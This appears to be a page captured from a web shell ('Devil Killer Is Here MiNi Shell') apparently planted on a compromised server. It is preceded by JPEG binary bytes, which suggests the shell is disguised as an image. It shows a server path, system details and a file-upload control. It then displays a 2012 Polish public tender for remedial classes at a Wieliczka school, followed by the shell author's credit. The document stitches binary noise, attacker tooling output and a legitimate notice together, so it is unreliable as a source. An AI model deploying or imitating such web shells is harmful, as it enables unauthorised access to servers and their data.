JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120604/187024-N-2012.html

<p class="kh_header"><b>Wieliczka: Zakup usług przeprowadzenia zajęć rewalidacyjnych dla uczniów klas I-III szkoły podstawowej w Zespole Szkół im. Brata Alojzego Kosiby w Wieliczce</b><br>
<b>Numer ogłoszenia: 187024 - 2012; data zamieszczenia: 04.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół  im. Brata Alojzego Kosiby , ul. Niepołomska 26c, 32-020 Wieliczka, woj. małopolskie, tel. 12 278 52 78, faks 12 278 52 78.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wieliczka.pl/zss</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług przeprowadzenia zajęć rewalidacyjnych dla uczniów klas I-III szkoły podstawowej w Zespole Szkół im. Brata Alojzego Kosiby w Wieliczce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania jest usługa przeprowadzenia zajęć dodatkowych dla niepełnosprawnych intelektualnie uczniów klas 
I- III szkoły podstawowej działającej w Zespole Szkół im.Br. Alojzego Kosiby w ramach realizacji projektu POKL.09.01.02-12-195/11
Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkoły podstawowej działającej w Zespole Szkół im. Br. A. Kosiby w Wieliczce:
a) Część I - zajęcia rewalidacyjne z zakresu usprawniania funkcji percepcyjno- motorycznych i komunikowania się 
b) Część II - zajęcia rewalidacyjne dla dzieci z trudnościami w czytaniu i pisaniu
c) Część III - zajęcia rewalidacyjne kształtujące umiejętności z zakresu pojęć matematycznych. 
2. I. Zajęcia rewalidacyjne z zakresu usprawniania funkcji percepcyjno- motorycznych i komunikowania się: 
3 grupy po 4 osoby, 30 godzin  w grupie, razem 90 godzin,  przy czym jako 1 godzinę zajęć Zamawiający rozumie 60 minut.
Program zajęć powinien zawierać co najmniej niżej wymienione moduły:
-Doskonalenie koordynacji wzrokowo - ruchowej
-Kształcenie koordynacji ręka - oko
-Wykształcenie umiejętności przekraczania linii środkowej ciała
-Doskonalenie poczucia rytmu
-Kształtowanie świadomości ciała
-Doskonalenie czucia głębokiego
-Niwelowanie nadwrażliwości i niedowrażliwości ciała
-Ćwiczenia usprawniające przedramię , nadgarstek, dłoń
-Usprawnianie i stymulacja funkcji motorycznych
-Wyrabianie koncentracji uwagi
-Ćwiczenia analizy i syntezy spostrzegania
-Ćwiczenia wyobraźni przestrzennej
-Obrysowywanie gotowych szablonów 
-Rysowanie szlaczków na kratkowanym papierze
-Rysowanie po konturach
-Malowanie palcami
-Łączenie wyznaczonych punktów
-Zagadki rysunkowe
-Labirynty
-Wycinanki różnego typu
-Kopiowanie obrazków przez kalkę techniczną
-Lepienie z plasteliny
-Gry zręcznościowe
-Ćwiczenia równoważne - na ławeczce, deskorolce, bieżni, pokonywanie torów przeszkód, dysku do balansowania itp
-Ćwiczenia oddechowe - dmuchanie baniek mydlanych, baloników, rozdmuchiwanie plam atramentu, przedmuchiwanie przez wyznaczony tor piłeczek pingpongowych itp.
-Wysłuchiwanie i rozpoznawanie określonych dźwięków - dom, ulica, zoo itp.
-Gra na prostych instrumentach muzycznych
-Aktywizowanie do mówienia
-Omawianie czynności i sytuacji
-Nazywanie przedmiotów, cech, czynności
-Komunikowanie się metodą Makatona
3. II. Zajęcia rewalidacyjne dla dzieci z trudnościami w czytaniu i pisaniu: 

2 grupy po 4 osoby, 30 godzin w grupie, razem 60 godzin, przy czym jako 1 godzinę zajęć Zamawiający rozumie 60 minut.

Program zajęć powinien zawierać co najmniej niżej wymienione moduły:
-segregowanie liter, rozpoznawanie i nazywanie liter 
-dobieranie liter wielkich do małych 
-dobieranie liter drukowanych do pisanych 
-utrwalanie kształtu liter 
-wyszukiwanie takich samych sylab, segregowanie takich samych sylab 
-wyodrębnianie liter w  wyrazach, różnicowanie liter 
-tworzenie wyrazów rozpoczynających się taką samą literą 
-dobieranie wyrazów różniących się tylko jedną literą ( w nagłosie, wygłosie, śródgłosie) 
-tworzenie wyrazów rozpoczynających się taką samą sylabą 
-wyszukiwanie takich samych wyrazów 
-uzupełnianie brakujących liter, sylab 
-uzupełnianie zdań z lukami 
-dobieranie podpisów do ilustracji 
-uzupełnianie zdań obrazkami, wyrazami 
-układanie zdań z rozsypanki wyrazowej 
-tworzenie krótkich tekstów składających się z 2, 3  zdań z rozsypanki wyrazowej jako odtworzenie tekstu słyszanego lub jako opis ilustracji
-kształtowanie umiejętności dokonywania syntezy i analizy wzrokowo- słuchowej
-ćwiczenia koordynacji wzrokowo - ruchowej i orientacji przestrzennej
-wzbogacanie słownictwa
-wdrażanie do wypowiadania się pełnymi zdaniami
-eliminowanie błędów i braków w czytaniu i pisaniu
-ćwiczenia umiejętności prawidłowego czytania
-ćwiczenia na materiale obrazkowym
-ćwiczenia grafomotoryczne
4. III. Zajęcia rewalidacyjne kształtujące umiejętności z zakresu pojęć matematycznych

2 grupy po 4 osoby, 30 godzin w grupie, razem 60 godzin, przy czym jako 1 godzinę zajęć Zamawiający rozumie 60 minut.

Program zajęć powinien zawierać co najmniej niżej wymienione moduły:
-Ćwiczenie orientacji przestrzennej
-Układanie wzorów 
-Rozróżnianie i nazywanie cyfr
-Pisanie cyfr po śladzie i samodzielnie
-Dobieranie odpowiedniej liczby przedmiotów do cyfry
-Przeliczanie elementów na konkretach
-Wyodrębnianie i tworzenie zbiorów wg różnych kryteriów
-Rozróżnianie monet
-Odczytywanie godziny na zegarze
-Kształtowanie pojęć matematycznych
-Dobieranie figur geometrycznych do odpowiednich kształtów
-Ćwiczenie umiejętności wykonywania operacji rachunkowych
5. Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:
Miejsce realizacji zajęć: Zespół Szkół im Br. A. Kosiby w Wieliczce ul. Niepołomska 26 c, 32-020 Wieliczka 

Rekrutację na zajęcia terapeutyczne prowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy. Wykonawca, który jest osobą prawną lub prowadzi działalność gospodarczą jest zobowiązany do podpisania umowy o powierzenie przetwarzania danych osobowych.

Czas realizacji zajęć: wrzesień 2012 - kwiecień 2013 roku według ustaleń z Zamawiającym. Czas trwania zajęć w jednym dniu wynosi 120 min.
Zajęcia będą odbywać się w dni powszednie w godzinach 8.00-15.00 w dni nauki szkolnej (z wyłączeniem wakacji, ferii i innych dni wolnych od zajęć dydaktycznych).  

Pomoce dydaktyczne do zajęć zakupione w ramach projektu zostaną udostępnione przez Zamawiającego w ramach realizacji zamówienia.
Szczegółowy harmonogram zostanie ustalony przed podpisaniem umowy z Wykonawcą. 
6. Obowiązki wykonawcy:
Do obowiązków Wykonawcy należy przede wszystkim:
a.	opracowanie i przedstawienie szczegółowego programu realizacji przedmiotu zamówienia,
b.	realizacja zajęć przez wykwalifikowane osoby posiadające doświadczenie w pracy z dziećmi upośledzonymi umysłowo, 
c.	w ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
-oznakowania sal, w których będą odbywały się zajęcia, zgodnie z zasadami oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, 
-oznaczania wszelkich dokumentów wytworzonych w czasie realizacji przedmiotu zamówienia, zgodnie z zasadami POKL, wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy. 
-przeprowadzenie diagnozy uczniów przed rozpoczęciem i po zakończeniu zajęć (ewaluacja)

7. Wykonawca po zakończeniu zajęć przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
-dziennik zajęć,
-pisemne opracowanie na temat przeprowadzonych zajęć sporządzone na formularzu dostarczonym przez Zamawiającego, zawierające pełną diagnozę pedagogiczną każdego ucznia biorącego udział w zajęciach, początkową  przeprowadzoną przed rozpoczęciem zajęć oraz końcową przeprowadzoną po ich zakończeniu oraz wnioski do dalszej pracy z uczniem
-informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem oraz kartą czasu pracy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują co najmniej jedną osobą w każdej części zamówienia, posiadającą kwalifikacje do pracy na stanowisku nauczyciela w szkole specjalnej dla dzieci upośledzonych umysłowo, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. nr 50, poz. 400.), która posiada wiedzę i umiejętności z zakresu objętego przedmiotem zamówienia oraz co najmniej 2 letnie doświadczenie w pracy na stanowisku nauczyciela w szkole specjalnej dla dzieci z upośledzeniem umysłowym, ukończony kurs metody Makatona i kurs pierwszej pomocy.
Każda  z części zamówienia musi być realizowana przez inną osobę ze względu na możliwość realizacji zajęć w tym samym czasie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Szczegółowy program dla wybranej części zajęć zawierający co najmniej cele, metody, formy pracy oraz tematykę i treść poszczególnych zajęć</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze. 2.Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowane, pełnomocnictwa) - jeśli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wieliczka.pl/zss/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespołu Szkół im Br. A. Kosiby w Wieliczce ul. Niepołomska 26 c, 32-020 Wieliczka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 08:45, miejsce: Zespołu Szkół im Br. A. Kosiby w Wieliczce ul. Niepołomska 26 c , 32-020 Wieliczka, pok. nr 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nr POKL.09.01.02-12-195/11 Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkoły podstawowej działającej w Zespole Szkół im. Br. A. Kosiby w Wieliczce: Zamówienie finansowane w 100% ze środków POKL, w tym 85% płatne ze środków europejskich a 15% dotacja celowa z budżetu państwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie zajęć rewalidacyjnych z zakresu usprawniania funkcji percepcyjno- motorycznych i komunikowania się.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. 3 grupy po 4 osoby, 30 godzin w grupie, razem 90 godzin,  przy czym jako 1 godzinę zajęć Zamawiający rozumie 60 minut. 2. Program zajęć powinien zawierać co najmniej niżej wymienione moduły: - Doskonalenie koordynacji wzrokowo - ruchowej
- Kształcenie koordynacji ręka - oko
- Wykształcenie umiejętności przekraczania linii środkowej ciała
- Doskonalenie poczucia rytmu
- Kształtowanie świadomości ciała
- Doskonalenie czucia głębokiego
- Niwelowanie nadwrażliwości i niedowrażliwości ciała
- Ćwiczenia usprawniające przedramię , nadgarstek, dłoń
- Usprawnianie i stymulacja funkcji motorycznych
- Wyrabianie koncentracji uwagi
- Ćwiczenia analizy i syntezy spostrzegania
- Ćwiczenia wyobraźni przestrzennej
- Obrysowywanie gotowych szablonów 
- Rysowanie szlaczków na kratkowanym papierze
- Rysowanie po konturach
- Malowanie palcami
- Łączenie wyznaczonych punktów
- Zagadki rysunkowe
- Labirynty
- Wycinanki różnego typu
- Kopiowanie obrazków przez kalkę techniczną
- Lepienie z plasteliny
- Gry zręcznościowe
- Ćwiczenia równoważne - na ławeczce, deskorolce, bieżni, pokonywanie torów przeszkód, dysku do balansowania itp
- Ćwiczenia oddechowe - dmuchanie baniek mydlanych, baloników, rozdmuchiwanie plam atramentu, przedmuchiwanie przez wyznaczony tor piłeczek pingpongowych itp.
- Wysłuchiwanie i rozpoznawanie określonych dźwięków - dom, ulica, zoo itp.
- Gra na prostych instrumentach muzycznych
- Aktywizowanie do mówienia
- Omawianie czynności i sytuacji
- Nazywanie przedmiotów, cech, czynności
- Komunikowanie się metodą Makatona.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie zajęć rewalidacyjnych dla dzieci z trudnościami w czytaniu i pisaniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.2 grupy po 4 osoby, 30 godzin w grupie, razem 60 godzin, przy czym jako 1 godzinę zajęć Zamawiający rozumie 60 minut.

2.Program zajęć powinien zawierać co najmniej niżej wymienione moduły:
-	segregowanie liter, rozpoznawanie i nazywanie liter 
-	dobieranie liter wielkich do małych 
-	dobieranie liter drukowanych do pisanych 
-	utrwalanie kształtu liter 
-	wyszukiwanie takich samych sylab, segregowanie takich samych sylab 
-	wyodrębnianie liter w  wyrazach, różnicowanie liter 
-	tworzenie wyrazów rozpoczynających się taką samą literą 
-	dobieranie wyrazów różniących się tylko jedną literą ( w nagłosie, wygłosie, śródgłosie) 
-	tworzenie wyrazów rozpoczynających się taką samą sylabą 
-	wyszukiwanie takich samych wyrazów 
-	uzupełnianie brakujących liter, sylab 
-	uzupełnianie zdań z lukami 
-	dobieranie podpisów do ilustracji 
-	uzupełnianie zdań obrazkami, wyrazami 
-	układanie zdań z rozsypanki wyrazowej 
-	tworzenie krótkich tekstów składających się z 2, 3  zdań z rozsypanki wyrazowej jako odtworzenie tekstu słyszanego lub jako opis ilustracji
-	kształtowanie umiejętności dokonywania syntezy i analizy wzrokowo- słuchowej
-	ćwiczenia koordynacji wzrokowo - ruchowej i orientacji przestrzennej
-	wzbogacanie słownictwa
-	wdrażanie do wypowiadania się pełnymi zdaniami
-	eliminowanie błędów i braków w czytaniu i pisaniu
-	ćwiczenia umiejętności prawidłowego czytania
-	ćwiczenia na materiale obrazkowym
-	ćwiczenia grafomotoryczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> prowadzenie zajęć rewalidacyjnych kształtujących umiejętności z zakresu pojęć matematycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.2 grupy po 4 osoby, 30 godzin w grupie, razem 60 godzin, przy czym jako 1 godzinę zajęć Zamawiający rozumie 60 minut.

2.Program zajęć powinien zawierać co najmniej niżej wymienione moduły:
-	Ćwiczenie orientacji przestrzennej
-	Układanie wzorów 
-	Rozróżnianie i nazywanie cyfr
-	Pisanie cyfr po śladzie i samodzielnie
-	Dobieranie odpowiedniej liczby przedmiotów do cyfry
-	Przeliczanie elementów na konkretach
-	Wyodrębnianie i tworzenie zbiorów wg różnych kryteriów
-	Rozróżnianie monet
-	Odczytywanie godziny na zegarze
-	Kształtowanie pojęć matematycznych
-	Dobieranie figur geometrycznych do odpowiednich kształtów
-	Ćwiczenie umiejętności wykonywania operacji rachunkowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com